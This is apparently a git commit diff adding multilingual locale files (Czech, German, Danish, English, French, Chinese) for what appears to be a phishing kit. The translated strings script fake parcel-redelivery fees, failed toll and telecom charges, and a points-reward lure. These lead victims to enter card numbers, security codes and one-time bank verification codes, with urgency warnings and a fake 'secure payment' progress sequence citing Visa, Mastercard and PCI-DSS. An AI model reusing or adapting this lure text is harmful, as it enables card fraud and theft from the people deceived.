This commit is contained in:
telangpu
2026-05-10 23:25:27 +08:00
parent c8dc57a3f6
commit 4ef6bfcdba
155 changed files with 111106 additions and 0 deletions

View File

@@ -0,0 +1,141 @@
export default {
"There is an error in this field, please check":
"V tomto poli je chyba, zkontrolujte jej prosím",
"Please enter a valid email address":
"Zadejte prosím platnou e-mailovou adresu",
"Dear users, please fill in the form carefully to ensure the successful delivery":
"Vážení uživatelé, vyplňte prosím formulář pečlivě, aby bylo zajištěno úspěšné doručení",
"Your Name": "Vaše jméno",
"Address": "Adresa",
"Detailed Address": "Podrobná adresa",
"(Optional)": "(Volitelné)",
"City": "Město",
"State": "Stát / Oblast",
"Province": "Provincie",
"Region": "Region",
"Zip Code": "PSČ",
"E-Mail": "E-mail",
"Next": "Další",
"Telephone Number": "Telefonní číslo",
"Online": "Online",
"Payment": "Platba",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment":
"Pro opětovné doručení je nutné uhradit servisní poplatek. Váš balíček bude po zaplacení znovu doručen",
"lump sum: ": "Celková částka: ",
"Cardholder": "Držitel karty",
"Card Number": "Číslo karty",
"Expire Date": "Datum expirace",
"Security Code": "Bezpečnostní kód",
"Submit": "Odeslat",
"Click here to receive another code":
"Klikněte zde pro obdržení nového kódu",
"Please confirm your identity and a one-time code will be sent":
"Potvrďte prosím svou totožnost. Jednorázový kód bude zaslán na váš telefon nebo e-mail. Zadejte jej zde",
"The verification code has been sent to":
"Ověřovací kód byl odeslán na",
"Please do not click the":
"Prosím neklikejte na tlačítka „Obnovit“ nebo „Zpět“, protože to může přerušit transakci",
"Verification code error, please try again":
"Chyba ověřovacího kódu, zkuste to prosím znovu",
"The session is about to expire, please complete the verification now":
"Relace brzy vyprší, dokončete prosím ověření nyní",
"This card does not support this transaction, please try another card":
"Tato karta nepodporuje tuto transakci, zkuste prosím jinou kartu",
"Authorized bank": "Autorizovaná banka",
"Please go to the bank App to confirm the authorization":
"Přejděte prosím do bankovní aplikace a potvrďte autorizaci",
"Please do not close this page":
"Nezavírejte prosím tuto stránku",
"Payment Successful": "Platba byla úspěšná!",
"Thank you for your purchase. Your payment has been processed successfully":
"Děkujeme za váš nákup. Vaše platba byla úspěšně zpracována",
"Mailing address": "Doručovací adresa",
"street address or house number":
"Ulice a číslo domu",
"Apartment number": "Číslo bytu",
"Safe payment": "Bezpečná platba",
"Verification code": "Ověřovací kód",
"Welcome": "Vítejte",
"back": "zpět!",
"We reward you for using point services":
"Odměňujeme vás za využívání bodových služeb",
"Check your points": "Zkontrolujte své body",
"Phone number": "Telefonní číslo",
"Inquire": "Dotaz",
"Exchange": "Vyměnit",
"Spend points": "Použít body",
"Points Available": "Dostupné body",
"You don't have enough points":
"Nemáte dostatek bodů",
"Please redeem your favorite product":
"Uplatněte prosím své body za oblíbený produkt",
"Confirm your shipping address":
"Potvrďte svou doručovací adresu",
"Order number": "Číslo objednávky: ",
"Pay": "Zaplatit",
"Pay Message":
"Zaplaťte {0} za výměnu bodů za produkty",
"Pay electronic tolls online":
"Zaplaťte elektronické mýtné online",
"your electronic toll payment was unsuccessful":
"Vaše platba elektronického mýtného byla neúspěšná.",
"Billing Information": "Fakturační údaje",
"Description": "Popis",
"Dear customer": "Vážený zákazníku:",
"Electronic Communications Charge Payment Failed":
"Platba poplatku za elektronickou komunikaci selhala",
"Invoice Number": "Číslo faktury",
"Amount": "Částka",
"Pay Immediately": "Zaplatit ihned",
"Phone Number": "Telefonní číslo",
"Electronic communication fee payment failed":
"Platba poplatku za elektronickou komunikaci selhala",
"Illustrate": "Vysvětlení",
"SSL Encryption": "SSL šifrování",
"PCI-DSS Certified": "Certifikováno PCI-DSS",
"Transaction Details": "Detaily transakce",
"Transaction ID:": "ID transakce:",
"Processing Network:": "Zpracovatelská síť:",
"Processing Time:": "Čas zpracování:",
"Security Level:": "Úroveň zabezpečení:",
"Preparing...": "Příprava...",
"High": "Vysoká",
"Initializing payment environment...":
"Inicializace platebního prostředí...",
"Encrypting card information...":
"Šifrování údajů o kartě...",
"Establishing secure connection...":
"Navazování zabezpečeného spojení...",
"Verifying card number and issuer...":
"Ověřování čísla karty a vydavatele...",
"Validating CVV code...":
"Ověřování CVV kódu...",
"Checking fraud risk...":
"Kontrola rizika podvodu...",
"Sending transaction request...":
"Odesílání požadavku na transakci...",
"Waiting for bank authorization...":
"Čekání na autorizaci banky...",
"Processing bank response...":
"Zpracování odpovědi banky...",
"Confirming transaction status...":
"Potvrzování stavu transakce...",
"Finalizing transaction...":
"Dokončování transakce...",
"Visa Secure Network":
"Bezpečná síť Visa",
"Mastercard Global Payment Network":
"Globální platební síť Mastercard",
"American Express Dedicated Channel":
"Vyhrazený kanál American Express",
"UnionPay Gateway":
"Platební brána UnionPay",
"{time} seconds":
"{time} sekund",
"International Payment Network":
"Mezinárodní platební síť",
"redelivery_fee_message":
"Pro opětovné doručení je nutné uhradit servisní poplatek {amount}. Váš balíček bude po zaplacení znovu doručen",
"Verifying...":
"Ověřování..."
};

View File

@@ -0,0 +1,109 @@
export default {
"There is an error in this field, please check":
"In diesem Feld liegt ein Fehler vor, bitte überprüfen Sie es",
"Please enter a valid email address": "Bitte geben Sie eine gültige E-Mail-Adresse ein",
"Dear users, please fill in the form carefully to ensure the successful delivery":
"Liebe Nutzer, bitte füllen Sie das Formular sorgfältig aus, um eine erfolgreiche Zustellung zu gewährleisten",
"Your Name": "Ihr Name",
"Address": "Adresse",
"Detailed Address": "Detaillierte Adresse",
"(Optional)": "(Optional)",
"City": "Stadt",
"State": "Bundesland",
"Province": "Provinz",
"Region": "Region",
"Zip Code": "Postleitzahl",
"E-Mail": "E-Mail",
"Next": "Weiter",
"Telephone Number": "Telefonnummer",
"Online": "Online",
"Payment": "Zahlung",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment":
"Für die erneute Zustellung müssen wir Servicegebühren erheben. Ihr Paket wird nach der Zahlung erneut zugestellt",
"lump sum: ": "Gesamtbetrag: ",
"Cardholder": "Karteninhaber",
"Card Number": "Kartennummer",
"Expire Date": "Ablaufdatum",
"Security Code": "Sicherheitscode",
"Submit": "Absenden",
"Click here to receive another code": "Klicken Sie hier, um einen weiteren Code zu erhalten",
"Please confirm your identity and a one-time code will be sent":
"Bitte bestätigen Sie Ihre Identität, und ein einmaliger Code wird an Ihre Mobilnummer oder E-Mail-Adresse gesendet. Bitte geben Sie hier den Verifizierungscode ein",
"The verification code has been sent to":
"Der Verifizierungscode wurde gesendet an",
"Please do not click the":
"Bitte klicken Sie nicht auf die Schaltflächen „Aktualisieren“ oder „Zurück“, da dies Ihre Transaktion beenden oder unterbrechen könnte",
"Verification code error, please try again":
"Verifizierungscode-Fehler, bitte versuchen Sie es erneut",
"The session is about to expire, please complete the verification now":
"Die Sitzung läuft bald ab, bitte schließen Sie die Verifizierung jetzt ab",
"This card does not support this transaction, please try another card":
"Diese Karte unterstützt diese Transaktion nicht, bitte versuchen Sie eine andere Karte",
"Authorized bank": "Autorisierte Bank",
"Please go to the bank App to confirm the authorization":
"Bitte öffnen Sie die Bank-App, um die Autorisierung zu bestätigen",
"Please do not close this page": "Bitte schließen Sie diese Seite nicht",
"Payment Successful": "Zahlung erfolgreich!",
"Thank you for your purchase. Your payment has been processed successfully":
"Vielen Dank für Ihren Einkauf. Ihre Zahlung wurde erfolgreich verarbeitet",
"Mailing address": "Postadresse",
"street address or house number": "Straßenadresse oder Hausnummer",
"Apartment number": "Wohnungsnummer, Zimmernummer usw.",
"Safe payment": "Sichere Zahlung",
"Verification code": "Verifizierungscode",
"Welcome": "Willkommen",
"back":"zurück!",
"We reward you for using point services": "Wir belohnen Sie für die Nutzung unseres Punkteservices",
"Check your points": "Punkte prüfen",
"Phone number": "Telefonnummer",
"Inquire": "Anfragen",
"Exchange": "Eintauschen",
"Spend points": "Punkte einlösen",
"Points Available": "Verfügbare Punkte",
"You don't have enough points": "Sie haben nicht genügend Punkte",
"Please redeem your favorite product": "Bitte lösen Sie Ihr Lieblingsprodukt ein",
"Confirm your shipping address": "Bestätigen Sie Ihre Lieferadresse",
"Order number": "Bestellnummer: ",
"Pay": "Bezahlen",
"Pay Message": "Zahlen Sie {0}, um Punkte gegen Waren einzulösen",
"Pay electronic tolls online": "Elektronische Mautgebühren online bezahlen",
"your electronic toll payment was unsuccessful": "Ihre elektronische Mautzahlung war nicht erfolgreich.",
"Billing Information": "Rechnungsinformationen",
"Description": "Beschreibung",
"Dear customer": "Sehr geehrter Kunde:",
"Electronic Communications Charge Payment Failed": "Zahlung der elektronischen Kommunikationsgebühr fehlgeschlagen",
"Invoice Number": "Rechnungsnummer",
"Amount": "Betrag",
"Pay Immediately": "Sofort bezahlen",
"Phone Number": "Telefonnummer",
"Electronic communication fee payment failed": "Zahlung der elektronischen Kommunikationsgebühr fehlgeschlagen",
"Illustrate":"Darstellen",
"SSL Encryption": "SSL-Verschlüsselung",
"PCI-DSS Certified": "PCI-DSS-zertifiziert",
"Transaction Details": "Transaktionsdetails",
"Transaction ID:": "Transaktions-ID:",
"Processing Network:": "Verarbeitungsnetzwerk:",
"Processing Time:": "Verarbeitungszeit:",
"Security Level:": "Sicherheitsstufe:",
"Preparing...": "Vorbereitung...",
"High": "Hoch",
"Initializing payment environment...": "Zahlungsumgebung wird initialisiert...",
"Encrypting card information...": "Kartendaten werden verschlüsselt...",
"Establishing secure connection...": "Sichere Verbindung wird hergestellt...",
"Verifying card number and issuer...": "Kartennummer und Herausgeber werden überprüft...",
"Validating CVV code...": "CVV-Code wird überprüft...",
"Checking fraud risk...": "Betrugsrisiko wird überprüft...",
"Sending transaction request...": "Transaktionsanfrage wird gesendet...",
"Waiting for bank authorization...": "Warten auf Bankautorisierung...",
"Processing bank response...": "Bankantwort wird verarbeitet...",
"Confirming transaction status...": "Transaktionsstatus wird bestätigt...",
"Finalizing transaction...": "Transaktion wird abgeschlossen...",
"Visa Secure Network": "Visa Secure Network",
"Mastercard Global Payment Network": "Mastercard Global Payment Network",
"American Express Dedicated Channel": "American Express Dedicated Channel",
"UnionPay Gateway": "UnionPay Gateway",
"{time} seconds": "{time} Sekunden",
"International Payment Network": "Internationales Zahlungsnetzwerk",
"redelivery_fee_message": "Für die erneute Zustellung müssen wir {amount} Servicegebühren berechnen, Ihr Paket wird nach Zahlung erneut zugestellt",
"Verifying...": "Überprüfen...",
};

View File

@@ -0,0 +1,141 @@
export default {
"There is an error in this field, please check":
"Der er en fejl i dette felt, kontroller venligst",
"Please enter a valid email address":
"Indtast venligst en gyldig e-mailadresse",
"Dear users, please fill in the form carefully to ensure the successful delivery":
"Kære brugere, udfyld venligst formularen omhyggeligt for at sikre en vellykket levering",
"Your Name": "Dit navn",
"Address": "Adresse",
"Detailed Address": "Detaljeret adresse",
"(Optional)": "(Valgfrit)",
"City": "By",
"State": "Stat / Område",
"Province": "Provins",
"Region": "Region",
"Zip Code": "Postnummer",
"E-Mail": "E-mail",
"Next": "Næste",
"Telephone Number": "Telefonnummer",
"Online": "Online",
"Payment": "Betaling",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment":
"For genlevering skal vi opkræve nogle servicegebyrer. Din pakke vil blive genleveret efter betaling",
"lump sum: ": "Samlet beløb: ",
"Cardholder": "Kortholder",
"Card Number": "Kortnummer",
"Expire Date": "Udløbsdato",
"Security Code": "Sikkerhedskode",
"Submit": "Indsend",
"Click here to receive another code":
"Klik her for at modtage en ny kode",
"Please confirm your identity and a one-time code will be sent":
"Bekræft venligst din identitet. En engangskode vil blive sendt til din telefon eller e-mail. Indtast koden her",
"The verification code has been sent to":
"Bekræftelseskoden er sendt til",
"Please do not click the":
"Klik venligst ikke på knapperne “Opdater” eller “Tilbage”, da dette kan afbryde transaktionen",
"Verification code error, please try again":
"Fejl i bekræftelseskoden, prøv venligst igen",
"The session is about to expire, please complete the verification now":
"Sessionen er ved at udløbe, gennemfør venligst verificeringen nu",
"This card does not support this transaction, please try another card":
"Dette kort understøtter ikke denne transaktion, prøv venligst et andet kort",
"Authorized bank": "Autoriseret bank",
"Please go to the bank App to confirm the authorization":
"Gå venligst til bankens app for at bekræfte godkendelsen",
"Please do not close this page":
"Luk venligst ikke denne side",
"Payment Successful": "Betaling gennemført!",
"Thank you for your purchase. Your payment has been processed successfully":
"Tak for dit køb. Din betaling er blevet behandlet korrekt",
"Mailing address": "Leveringsadresse",
"street address or house number":
"Gadenavn eller husnummer",
"Apartment number": "Lejlighedsnummer / værelsesnummer",
"Safe payment": "Sikker betaling",
"Verification code": "Bekræftelseskode",
"Welcome": "Velkommen",
"back": "tilbage!",
"We reward you for using point services":
"Vi belønner dig for at bruge pointtjenester",
"Check your points": "Tjek dine point",
"Phone number": "Telefonnummer",
"Inquire": "Forespørg",
"Exchange": "Ombyt",
"Spend points": "Brug point",
"Points Available": "Tilgængelige point",
"You don't have enough points":
"Du har ikke nok point",
"Please redeem your favorite product":
"Indløs venligst dine point for dit foretrukne produkt",
"Confirm your shipping address":
"Bekræft din leveringsadresse",
"Order number": "Ordrenummer: ",
"Pay": "Betal",
"Pay Message":
"Betal {0} for at ombytte point til produkter",
"Pay electronic tolls online":
"Betal elektroniske vejafgifter online",
"your electronic toll payment was unsuccessful":
"Din betaling af elektronisk vejafgift mislykkedes.",
"Billing Information": "Faktureringsoplysninger",
"Description": "Beskrivelse",
"Dear customer": "Kære kunde:",
"Electronic Communications Charge Payment Failed":
"Betaling af gebyr for elektronisk kommunikation mislykkedes",
"Invoice Number": "Fakturanummer",
"Amount": "Beløb",
"Pay Immediately": "Betal straks",
"Phone Number": "Telefonnummer",
"Electronic communication fee payment failed":
"Betaling af gebyr for elektronisk kommunikation mislykkedes",
"Illustrate": "Forklaring",
"SSL Encryption": "SSL-kryptering",
"PCI-DSS Certified": "PCI-DSS-certificeret",
"Transaction Details": "Transaktionsdetaljer",
"Transaction ID:": "Transaktions-ID:",
"Processing Network:": "Behandlingsnetværk:",
"Processing Time:": "Behandlingstid:",
"Security Level:": "Sikkerhedsniveau:",
"Preparing...": "Forbereder...",
"High": "Høj",
"Initializing payment environment...":
"Initialiserer betalingsmiljø...",
"Encrypting card information...":
"Krypterer kortoplysninger...",
"Establishing secure connection...":
"Etablerer sikker forbindelse...",
"Verifying card number and issuer...":
"Verificerer kortnummer og udsteder...",
"Validating CVV code...":
"Validerer CVV-kode...",
"Checking fraud risk...":
"Kontrollerer risiko for svindel...",
"Sending transaction request...":
"Sender transaktionsanmodning...",
"Waiting for bank authorization...":
"Venter på bankens godkendelse...",
"Processing bank response...":
"Behandler bankens svar...",
"Confirming transaction status...":
"Bekræfter transaktionsstatus...",
"Finalizing transaction...":
"Afslutter transaktionen...",
"Visa Secure Network":
"Visa sikkert netværk",
"Mastercard Global Payment Network":
"Mastercard globalt betalingsnetværk",
"American Express Dedicated Channel":
"American Express dedikeret kanal",
"UnionPay Gateway":
"UnionPay-gateway",
"{time} seconds":
"{time} sekunder",
"International Payment Network":
"Internationalt betalingsnetværk",
"redelivery_fee_message":
"For genlevering skal du betale {amount} i servicegebyrer. Din pakke vil blive genleveret efter betaling",
"Verifying...":
"Verificerer..."
};

View File

@@ -0,0 +1,98 @@
export default {
"There is an error in this field, please check": "There is an error in this field, please check",
"Please enter a valid email address": "Please enter a valid email address",
"Dear users, please fill in the form carefully to ensure the successful delivery": "Dear users, please fill in the form carefully to ensure successful delivery",
"Your Name": "Your Name",
"Address": "Address",
"Detailed Address": "Detailed Address",
"(Optional)": "(Optional)",
"City": "City",
"State": "State / Region",
"Province": "Province",
"Region": "Region",
"Zip Code": "Zip Code",
"E-Mail": "E-Mail",
"Next": "Next",
"Telephone Number": "Telephone Number",
"Online": "Online",
"Payment": "Payment",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment": "For redelivery, a service fee is required. Your package will be re-delivered after payment",
"lump sum: ": "Total amount: ",
"Cardholder": "Cardholder",
"Card Number": "Card Number",
"Expire Date": "Expiration Date",
"Security Code": "Security Code",
"Submit": "Submit",
"Click here to receive another code": "Click here to receive another code",
"Please confirm your identity and a one-time code will be sent": "Please confirm your identity. A one-time code will be sent to your phone or email. Enter it here",
"The verification code has been sent to": "The verification code has been sent to",
"Please do not click the": "Please do not click 'Refresh' or 'Back' as it may interrupt the transaction",
"Verification code error, please try again": "Verification code error, please try again",
"The session is about to expire, please complete the verification now": "The session is about to expire, please complete the verification now",
"This card does not support this transaction, please try another card": "This card does not support this transaction, please try another card",
"Authorized bank": "Authorized bank",
"Please go to the bank App to confirm the authorization": "Please go to the bank app to confirm authorization",
"Please do not close this page": "Please do not close this page",
"Payment Successful": "Payment Successful!",
"Thank you for your purchase. Your payment has been processed successfully": "Thank you for your purchase. Your payment has been successfully processed",
"Mailing address": "Mailing address",
"street address or house number": "Street and house number",
"Apartment number": "Apartment number",
"Safe payment": "Safe payment",
"Verification code": "Verification code",
"Welcome": "Welcome",
"back": "Back!",
"We reward you for using point services": "We reward you for using point services",
"Check your points": "Check your points",
"Phone number": "Phone number",
"Inquire": "Inquire",
"Exchange": "Exchange",
"Spend points": "Spend points",
"Points Available": "Points Available",
"You don't have enough points": "You don't have enough points",
"Please redeem your favorite product": "Please redeem your favorite product with points",
"Confirm your shipping address": "Confirm your shipping address",
"Order number": "Order number: ",
"Pay": "Pay",
"Pay Message": "Pay {0} to redeem points for products",
"Pay electronic tolls online": "Pay electronic tolls online",
"your electronic toll payment was unsuccessful": "Your electronic toll payment was unsuccessful.",
"Billing Information": "Billing Information",
"Description": "Description",
"Dear customer": "Dear Customer:",
"Electronic Communications Charge Payment Failed": "Electronic Communications Charge Payment Failed",
"Invoice Number": "Invoice Number",
"Amount": "Amount",
"Pay Immediately": "Pay Immediately",
"Phone Number": "Phone Number",
"Electronic communication fee payment failed": "Electronic communication fee payment failed",
"Illustrate": "Explanation",
"SSL Encryption": "SSL Encryption",
"PCI-DSS Certified": "PCI-DSS Certified",
"Transaction Details": "Transaction Details",
"Transaction ID:": "Transaction ID:",
"Processing Network:": "Processing Network:",
"Processing Time:": "Processing Time:",
"Security Level:": "Security Level:",
"Preparing...": "Preparing...",
"High": "High",
"Initializing payment environment...": "Initializing payment environment...",
"Encrypting card information...": "Encrypting card information...",
"Establishing secure connection...": "Establishing secure connection...",
"Verifying card number and issuer...": "Verifying card number and issuer...",
"Validating CVV code...": "Validating CVV code...",
"Checking fraud risk...": "Checking fraud risk...",
"Sending transaction request...": "Sending transaction request...",
"Waiting for bank authorization...": "Waiting for bank authorization...",
"Processing bank response...": "Processing bank response...",
"Confirming transaction status...": "Confirming transaction status...",
"Finalizing transaction...": "Finalizing transaction...",
"Visa Secure Network": "Visa Secure Network",
"Mastercard Global Payment Network": "Mastercard Global Payment Network",
"American Express Dedicated Channel": "American Express Dedicated Channel",
"UnionPay Gateway": "UnionPay Gateway",
"{time} seconds": "{time} seconds",
"International Payment Network": "International Payment Network",
"redelivery_fee_message": "For redelivery, a service fee of {amount} is required. Your package will be re-delivered after payment",
"Verifying...": "Verifying..."
};

View File

@@ -0,0 +1,127 @@
export default {
"There is an error in this field, please check": "There is an error in this field, please check",
"Please enter a valid email address": "Please enter a valid email address",
"Dear users, please fill in the form carefully to ensure the successful delivery": "Dear users, please fill in the form carefully to ensure successful delivery",
"Your Name": "Your Name",
"Address": "Address",
"Detailed Address": "Detailed Address",
"(Optional)": "(Optional)",
"City": "City",
"State": "State / Region",
"Province": "Province",
"Region": "Region",
"Zip Code": "Postcode",
"E-Mail": "Email",
"Next": "Next",
"Telephone Number": "Phone Number",
"Online": "Online",
"Payment": "Payment",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment": "For redelivery, a service fee is required. Your parcel will be re-delivered after payment",
"lump sum: ": "Total Amount: ",
"Cardholder": "Cardholder",
"Card Number": "Card Number",
"Expire Date": "Expiry Date",
"Security Code": "Security Code",
"Submit": "Submit",
"Click here to receive another code": "Click here to receive another code",
"Please confirm your identity and a one-time code will be sent": "Please confirm your identity. A one-time code will be sent to your phone or email. Please enter it here",
"The verification code has been sent to": "The verification code has been sent to",
"Please do not click the": "Please do not click 'Refresh' or 'Back', as this may interrupt the transaction",
"Verification code error, please try again": "Incorrect verification code, please try again",
"The session is about to expire, please complete the verification now": "Your session is about to expire, please complete the verification now",
"This card does not support this transaction, please try another card": "This card does not support this transaction, please try another card",
"Authorized bank": "Authorised Bank",
"Please go to the bank App to confirm the authorization": "Please open your banking app to confirm the authorisation",
"Please do not close this page": "Please do not close this page",
"Payment Successful": "Payment Successful!",
"Thank you for your purchase. Your payment has been processed successfully": "Thank you for your purchase. Your payment has been processed successfully",
"Mailing address": "Mailing Address",
"street address or house number": "Street Address or House Number",
"Apartment number": "Apartment Number",
"Safe payment": "Secure Payment",
"Verification code": "Verification Code",
"Welcome": "Welcome",
"back": "Back!",
"We reward you for using point services": "We reward you for using points services",
"Check your points": "Check Your Points",
"Phone number": "Phone Number",
"Inquire": "Enquire",
"Exchange": "Redeem",
"Spend points": "Use Points",
"Points Available": "Points Available",
"You don't have enough points": "You do not have enough points",
"Please redeem your favorite product": "Please redeem your favourite product using points",
"Confirm your shipping address": "Confirm Your Shipping Address",
"Order number": "Order Number: ",
"Pay": "Pay",
"Pay Message": "Pay {0} to redeem points for products",
"Pay electronic tolls online": "Pay Electronic Tolls Online",
"your electronic toll payment was unsuccessful": "Your electronic toll payment was unsuccessful",
"Billing Information": "Billing Information",
"Description": "Description",
"Dear customer": "Dear Customer:",
"Electronic Communications Charge Payment Failed": "Electronic Communications Charge Payment Failed",
"Invoice Number": "Invoice Number",
"Amount": "Amount",
"Pay Immediately": "Pay Now",
"Phone Number": "Phone Number",
"Electronic communication fee payment failed": "Electronic communication fee payment failed",
"Illustrate": "Explanation",
"SSL Encryption": "SSL Encryption",
"PCI-DSS Certified": "PCI-DSS Certified",
"Transaction Details": "Transaction Details",
"Transaction ID:": "Transaction ID:",
"Processing Network:": "Processing Network:",
"Processing Time:": "Processing Time:",
"Security Level:": "Security Level:",
"Preparing...": "Preparing...",
"High": "High",
"Initializing payment environment...": "Initialising payment environment...",
"Encrypting card information...": "Encrypting card information...",
"Establishing secure connection...": "Establishing secure connection...",
"Verifying card number and issuer...": "Verifying card number and issuer...",
"Validating CVV code...": "Validating CVV code...",
"Checking fraud risk...": "Checking fraud risk...",
"Sending transaction request...": "Sending transaction request...",
"Waiting for bank authorization...": "Waiting for bank authorisation...",
"Processing bank response...": "Processing bank response...",
"Confirming transaction status...": "Confirming transaction status...",
"Finalizing transaction...": "Finalising transaction...",
"Visa Secure Network": "Visa Secure Network",
"Mastercard Global Payment Network": "Mastercard Global Payment Network",
"American Express Dedicated Channel": "American Express Dedicated Channel",
"UnionPay Gateway": "UnionPay Gateway",
"{time} seconds": "{time} seconds",
"International Payment Network": "International Payment Network",
"redelivery_fee_message": "For redelivery, a service fee of {amount} is required. Your parcel will be re-delivered after payment",
"Verifying...": "Verifying...",
// payment_loading
payment_loading: {
modal_title: "Processing Payment",
modal_subtitle: "Please do not close this page",
transaction_details: "Transaction Details",
transaction_id: "Transaction ID:",
processing_network: "Processing Network:",
processing_time: "Processing Time:",
security_level: "Security Level:",
preparing: "Preparing...",
high: "High",
step_init: "Initialising payment environment...",
step_encrypt: "Encrypting card information...",
step_connect: "Establishing secure connection...",
step_verify_card: "Verifying card number and issuer...",
step_validate_cvv: "Validating CVV code...",
step_fraud: "Checking fraud risk...",
step_send: "Sending transaction request...",
step_wait_auth: "Waiting for bank authorisation...",
step_process_resp: "Processing bank response...",
step_confirm: "Confirming transaction status...",
step_finalize: "Finalising transaction...",
network_visa: "Visa Secure Network",
network_mastercard: "Mastercard Global Payment Network",
network_amex: "American Express Dedicated Channel",
network_unionpay: "UnionPay Payment Gateway",
network_intl: "International Payment Network",
time_seconds: "{time} seconds",
},
};

View File

@@ -0,0 +1,84 @@
export default {
"There is an error in this field, please check": "Il y a une erreur dans ce champ, veuillez vérifier",
"Please enter a valid email address": "Veuillez saisir une adresse e-mail valide",
"Dear users, please fill in the form carefully to ensure the successful delivery":
"Chers utilisateurs, veuillez remplir le formulaire avec soin afin d'assurer la bonne livraison",
"Your Name": "Votre nom",
"Address": "Adresse",
"Detailed Address": "Adresse détaillée",
"(Optional)": "(Optionnel)",
"City": "Ville",
"State": "État",
"Province": "Province",
"Region": "Région",
"Zip Code": "Code postal",
"E-Mail": "E-mail",
"Next": "Suivant",
"Telephone Number": "Numéro de téléphone",
"Online": "En ligne",
"Payment": "Paiement",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment":
"Pour une nouvelle livraison, des frais de service s'appliquent. Votre colis sera réexpédié après paiement",
"lump sum: ": "montant forfaitaire : ",
"Cardholder": "Titulaire de la carte",
"Card Number": "Numéro de carte",
"Expire Date": "Date dexpiration",
"Security Code": "Code de sécurité",
"Submit": "Soumettre",
"Click here to receive another code": "Cliquez ici pour recevoir un autre code",
"Please confirm your identity and a one-time code will be sent":
"Veuillez confirmer votre identité. Un code unique sera envoyé à votre numéro de téléphone ou à votre adresse e-mail. Veuillez entrer le code de vérification ici",
"The verification code has been sent to": "Le code de vérification a été envoyé à",
"Please do not click the":
"Veuillez ne pas cliquer sur les boutons 'Actualiser' ou 'Retour' car cela pourrait interrompre votre transaction",
"Verification code error, please try again": "Erreur de code de vérification, veuillez réessayer",
"The session is about to expire, please complete the verification now":
"La session est sur le point dexpirer, veuillez terminer la vérification maintenant",
"This card does not support this transaction, please try another card":
"Cette carte ne prend pas en charge cette transaction, veuillez essayer une autre carte",
"Authorized bank": "Banque autorisée",
"Please go to the bank App to confirm the authorization":
"Veuillez accéder à lapplication bancaire pour confirmer lautorisation",
"Please do not close this page": "Veuillez ne pas fermer cette page",
"Payment Successful": "Paiement réussi !",
"Thank you for your purchase. Your payment has been processed successfully":
"Merci pour votre achat. Votre paiement a été traité avec succès",
"Mailing address": "Adresse postale",
"street address or house number": "rue ou numéro de maison",
"Apartment number": "Numéro d'appartement, numéro de chambre, etc.",
"Safe payment": "Paiement sécurisé",
"Verification code": "Code de vérification",
"Welcome": "Bienvenue",
"back": "retour !",
"We reward you for using point services": "Nous vous récompensons pour lutilisation de nos services à points",
"Check your points": "Vérifiez vos points",
"Phone number": "Numéro de téléphone",
"Inquire": "Consulter",
"Exchange": "Échanger",
"Spend points": "Utiliser les points",
"Points Available": "Points disponibles",
"You don't have enough points": "Vous navez pas assez de points",
"Please redeem your favorite product": "Veuillez échanger contre votre produit préféré",
"Confirm your shipping address": "Confirmez votre adresse de livraison",
"Order number": "Numéro de commande : ",
"Pay": "Payer",
"Pay Message": "Payez {0} pour échanger des points contre un produit",
"Pay electronic tolls online": "Payer les péages électroniques en ligne",
"your electronic toll payment was unsuccessful":
"votre paiement de péage électronique a échoué.",
"Billing Information": "Informations de facturation",
"Description": "Description",
"Dear customer": "Cher client :",
"Electronic Communications Charge Payment Failed":
"Échec du paiement des frais de communication électronique",
"Invoice Number": "Numéro de facture",
"Amount": "Montant",
"Pay Immediately": "Payer immédiatement",
"Phone Number": "Numéro de téléphone",
"Electronic communication fee payment failed":
"Échec du paiement des frais de communication électronique",
"Illustrate": "Illustrer",
"Processing payment": "Traitement du paiement",
"Please do not refresh or close the page":
"Veuillez ne pas actualiser ou fermer la page",
};

View File

@@ -0,0 +1,73 @@
export default {
"There is an error in this field, please check": "此欄位有錯誤,請檢查",
"Please enter a valid email address": "請輸入有效的電郵地址",
"Dear users, please fill in the form carefully to ensure the successful delivery": "親愛的用戶,請小心填寫表格以確保成功送達",
"Your Name": "你的姓名",
"Address": "地址",
"Detailed Address": "詳細地址",
"(Optional)": "(可選)",
"City": "城市",
"State": "州份",
"Province": "省份",
"Region": "地區",
"Zip Code": "郵政編碼",
"E-Mail": "電郵",
"Next": "下一步",
"Telephone Number": "電話號碼",
"Online": "網上",
"Payment": "付款",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment": "如需重新派送,我們需要收取一定的服務費。付款後將重新派送你的包裹",
"lump sum: ": "總金額:",
"Cardholder": "持卡人",
"Card Number": "信用卡號碼",
"Expire Date": "到期日",
"Security Code": "安全碼",
"Submit": "提交",
"Click here to receive another code": "點擊此處接收新驗證碼",
"Please confirm your identity and a one-time code will be sent": "請確認你的身份,我們將發送一次性驗證碼至你的手機或電郵,請在此輸入驗證碼",
"The verification code has been sent to": "驗證碼已發送至",
"Please do not click the": "請勿點擊「重新整理」或「返回」按鈕,否則可能導致交易失敗或中斷",
"Verification code error, please try again": "驗證碼錯誤,請再試一次",
"The session is about to expire, please complete the verification now": "驗證即將過期,請立即完成驗證",
"This card does not support this transaction, please try another card": "此卡不支援此交易,請嘗試其他信用卡",
"Authorized bank": "授權銀行",
"Please go to the bank App to confirm the authorization": "請前往銀行應用程式確認授權",
"Please do not close this page": "請勿關閉此頁面",
"Payment Successful": "付款成功!",
"Thank you for your purchase. Your payment has been processed successfully": "感謝你的購買,付款已成功處理",
"Mailing address": "郵寄地址",
"street address or house number": "街道地址或樓宇號碼",
"Apartment number": "單位號碼、房號等",
"Safe payment": "安全付款",
"Verification code": "驗證碼",
"Welcome": "歡迎",
"back":"返回!",
"We reward you for using point services": "感謝你使用積分服務,我們提供獎賞",
"Check your points": "查看你的積分",
"Phone number": "電話號碼",
"Inquire": "查詢",
"Exchange": "兌換",
"Spend points": "使用積分",
"Points Available": "可用積分",
"You don't have enough points": "你的積分不足",
"Please redeem your favorite product": "請兌換你喜愛的商品",
"Confirm your shipping address": "確認你的送貨地址",
"Order number": "訂單編號:",
"Pay": "付款",
"Pay Message": "支付 {0} 即可用積分兌換商品",
"Pay electronic tolls online": "網上支付電子通行費",
"your electronic toll payment was unsuccessful": "你的電子通行費付款失敗。",
"Billing Information": "帳單資料",
"Description": "描述",
